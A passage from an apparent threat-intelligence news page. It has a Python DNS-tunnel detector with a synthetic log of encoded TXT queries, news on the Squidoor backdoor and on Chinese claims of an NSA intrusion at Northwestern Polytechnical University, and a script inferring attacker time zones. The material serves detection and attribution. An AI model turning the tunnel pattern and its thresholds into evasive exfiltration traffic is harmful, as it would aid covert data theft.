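    return {d: {"unique": len(p["subs"]), "mean_len": p["len"] / p["n"],
                "mean_entropy": p["ent"] / p["n"], "odd_type_ratio": p["odd"] / p["n"]}
            for d, p in per.items()}


def flag_tunnels(lines, min_unique=5, min_len=30, min_entropy=3.5) -> list:
    """Parent domains whose subdomain traffic looks like encoded payload chunks."""
    return sorted(d for d, s in profile(lines).items()
                  if s["unique"] >= min_unique and s["mean_len"] >= min_len
                  and s["mean_entropy"] >= min_entropy)


def _chunk(i: int) -> str:
    """Deterministic high-entropy label standing in for one encoded payload chunk."""
    digest = hashlib.sha256(f"chunk{i}".encode()).digest()
    return base64.b32encode(digest).decode().rstrip("=").lower()


# Constructed resolver log: ordinary lookups plus eight tunnel-style TXT queries.
SAMPLE_LINES = [
    "1709290001 10.0.5.21 A www.example.com",
    "1709290002 10.0.5.21 A mail.example.net",
    "1709290003 10.0.5.22 AAAA cdn.example.org",
    "1709290004 10.0.5.21 A api.example.com",
    "1709290005 10.0.5.22 A login.example.net",
] + [f"17092900{10 + i:02d} 10.0.5.21 TXT {_chunk(i)}.upd-cdn.example" for i in range(8)]

if __name__ == "__main__":
    for domain, stats in profile(SAMPLE_LINES).items():
        print(domain, stats)
    print("suspected tunnels:", flag_tunnels(SAMPLE_LINES))
```

A real deployment adds a per-client dimension (one host talking to one domain with thousands of unique labels) and an allowlist for legitimate high-entropy senders such as anti-spam reputation services and CDN health checks, which otherwise dominate the false positives.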

Recommended read:
References :
  • gbhackers.com: Squidoor: Multi-Vector Malware Exploiting Outlook API, DNS & ICMP Tunneling for C2
  • Virus Bulletin: Palo Alto Networks researchers Lior Rochberger & Tom Fakterman analyse Squidoor. The backdoor was used in a malicious activity cluster targeting governments, defence, telecommunication, education and aviation sectors in Southeast Asia and South America.
  • Anonymous: Have you heard of the rarely observed technique abusing cdb.exe? A new backdoor called Squidoor utilizes this technique, and is in the toolkit of a suspected Chinese threat actor targeting multiple countries and sectors.
  • Talkback Resources: Squidoor: Suspected Chinese Threat Actor’s Backdoor Targets Global Organizations
  • www.cysecurity.news: New Malware Targets Aviation and Satellite Firms

@gbhackers.com //
Chinese cybersecurity entities are accusing the U.S. National Security Agency (NSA) of orchestrating a multi-year cyber espionage campaign against Northwestern Polytechnical University (NPU), a leading Chinese institution specializing in aerospace and defense research. The allegations, published by organizations such as Qihoo 360 and the National Computer Virus Emergency Response Center (CVERC), claim that the NSA’s Tailored Access Operations (TAO) unit, referred to as “APT-C-40” by Chinese sources, conducted the attack in 2022. The university disclosed the breach in June 2022, reporting phishing emails targeting staff and students as the initial vector.

According to Chinese investigators, the NSA allegedly deployed over 40 malware strains and leveraged zero-day vulnerabilities to gain access. Tools such as NOPEN and SECONDDATE, previously linked to the NSA, were reportedly used to establish persistence and intercept network traffic. Chinese cybersecurity firms attribute the attack to the NSA based on forensic analysis and operational patterns, noting that nearly all attack activity occurred during U.S. business hours, with no activity on weekends or U.S. holidays. A misconfigured script also revealed directory paths linked to TAO’s tools, including a Linux directory associated with NSA operations.
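The working-hours argument in the attribution is a standard analyst technique that is easy to reproduce: take the UTC timestamps of attacker activity, test every candidate UTC offset, and see which one makes the activity land on weekday business hours and avoid that country's holidays. Here is an added Python example (my own, not code or data from the Chinese reports) that does this over a constructed activity set generated in UTC-5; the two holiday dates are 2022 U.S. federal holidays used purely to illustrate the holiday check.

```python
import random
from datetime import datetime, timedelta, timezone

WORK_HOURS = range(9, 18)                          # local 09:00-17:59
US_HOLIDAYS_2022 = {"2022-01-17", "2022-02-21"}    # MLK Day, Presidents' Day


def workday_fit(ts_utc, offset_hours: int, work=WORK_HOURS) -> float:
    """Share of events that fall on a Mon-Fri working hour in UTC+offset."""
    tz = timezone(timedelta(hours=offset_hours))
    inside = 0
    for t in ts_utc:
        local = t.astimezone(tz)
        inside += local.weekday() < 5 and local.hour in work
    return inside / len(ts_utc)


def infer_offsets(ts_utc, top=3) -> list:
    """Rank UTC offsets -12..+14 by how well a business-hours pattern explains the data."""
    scores = {off: workday_fit(ts_utc, off) for off in range(-12, 15)}
    return sorted(scores.items(), key=lambda kv: (-kv[1], kv[0]))[:top]


def off_hours_events(ts_utc, offset_hours: int, holidays=US_HOLIDAYS_2022) -> list:
    """Events on weekends or listed holidays in the candidate zone (should be near empty)."""
    tz = timezone(timedelta(hours=offset_hours))
    out = []
    for t in ts_utc:
        local = t.astimezone(tz)
        if local.weekday() >= 5 or local.strftime("%Y-%m-%d") in holidays:
            out.append(local)
    return out


def constructed_activity(seed=7, offset_hours=-5, events_per_day=8) -> list:
    """Synthetic operator activity: weekdays only, 09-17 local, skipping the two holidays.
    Each day gets one event at 09:xx and one at 17:xx so the window edges are exercised."""
    rng = random.Random(seed)
    tz = timezone(timedelta(hours=offset_hours))
    day, end = datetime(2022, 1, 10, tzinfo=tz), datetime(2022, 2, 26, tzinfo=tz)
    out = []
    while day < end:
        if day.weekday() < 5 and day.strftime("%Y-%m-%d") not in US_HOLIDAYS_2022:
            hours = [9, 17] + [rng.randrange(9, 18) for _ in range(events_per_day - 2)]
            for h in hours:
                t = day.replace(hour=h, minute=rng.randrange(60))
                out.append(t.astimezone(timezone.utc))
        day += timedelta(days=1)
    return out


if __name__ == "__main__":
    activity = constructed_activity()
    print("best offsets:", infer_offsets(activity))
    print("off-hours events at UTC-5:", len(off_hours_events(activity, -5)))
```

The method only ever yields an offset, not a country, and operators who work shifts or deliberately schedule activity defeat it; it carries weight in the reports above because it is combined with tooling overlap and the leaked directory paths, not on its own.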

Recommended read:
References :
  • discuss.privacyguides.net: An inside look at NSA (Equation Group) attack on China
  • gbhackers.com: NSA Allegedly Hacked Northwestern Polytechnical University, China Claims
  • Talkback Resources: China’s Cybersecurity Firms Reveal Alleged NSA (Equation Group) Tactics in University Hack [for] [mal]